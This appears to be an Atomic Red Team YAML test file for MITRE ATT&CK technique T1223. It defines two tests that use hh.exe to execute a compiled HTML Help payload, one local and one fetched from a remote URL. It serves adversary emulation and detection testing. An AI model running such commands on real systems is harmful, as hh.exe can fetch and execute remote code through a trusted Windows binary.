Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
43 lines
991 B
YAML
43 lines
991 B
YAML
---
|
|
attack_technique: T1223
|
|
display_name: Compiled HTML File
|
|
|
|
atomic_tests:
|
|
- name: Compiled HTML Help Local Payload
|
|
description: |
|
|
Uses hh.exe to execute a local compiled HTML Help payload.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
local_chm_file:
|
|
description: Local .chm payload
|
|
type: path
|
|
default: C:\atomic-red-team\atomics\T1223\src\T1223.chm
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
hh.exe #{local_chm_file}
|
|
|
|
- name: Compiled HTML Help Remote Payload
|
|
description: |
|
|
Uses hh.exe to execute a remote compiled HTML Help payload.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
remote_chm_file:
|
|
description: Remote .chm payload
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
hh.exe #{remote_chm_file}
|